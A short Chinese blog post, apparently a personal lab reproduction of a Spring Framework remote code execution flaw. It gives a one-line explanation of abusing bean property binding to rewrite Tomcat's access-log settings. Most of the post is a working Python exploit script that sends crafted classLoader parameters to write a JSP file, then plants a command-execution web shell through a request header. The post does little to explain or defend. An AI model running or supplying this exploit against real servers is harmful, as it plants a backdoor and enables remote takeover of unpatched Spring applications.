标签 RealWord 下的文章

起因经过

这个洞在29号漏出后,我反正是摆烂的,没怎么动手。
后面在31号才拿到环境,然后利用作者写的文章进行复现。

  1. 简单的idea Spring项目环境搭建,坑点是有几个依赖包没有,以及JDK17不支持漏洞。
  2. 实现原理:通过Bean对象的生成中有缓存class方式,然后通过这个利用点,构造log日志调用链,从而达到rec的目的。
  3. exp
    from time import sleep
    
    import requests
    
    test = ["class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bfuck%7Di",
            "class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp",
            "class.module.classLoader.resources.context.parent.pipeline.first.directory=/Users/yunoon/Downloads/spring"
            "-rce-war-fa55cb4b11516784574d06948d53ac90f8430f50/out/artifacts/stupidRumor_war_exploded",
            "class.module.classLoader.resources.context.parent.pipeline.first.prefix=fuckJsp",
            "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="]
    
    url = "http://localhost:8084/stupidRumor_war_exploded/index?"
    
    url2 = "http://localhost:8084/stupidRumor_war_exploded/index?"
    for i in range(5):
        url2 = url2 + "&" + test[i]
    print(url2)
    res = requests.get(url=url2)
    print(res.status_code)
    
    header = {
        'User-Agent': "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 "
                      "Safari/537.36",
        'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        'fuck': '<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>',
        'Accept-Language': "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        'Accept-Encoding': "gzip, deflate",
        'Connection': "close",
        'Upgrade-Insecure-Requests': "1",
        'Sec-Fetch-Dest': "document",
        'Sec-Fetch-Mode': "navigate",
        'Sec-Fetch-Site': "none",
        'Sec-Fetch-User': "?1",
    }
    #
    url1 = "http://localhost:8084/stupidRumor_war_exploded/fuckUUUU"
    res = requests.get(url=url1, headers=header)
    print(res.status_code)
    
    
  4. 后面后空会分析原理的,咕咕咕。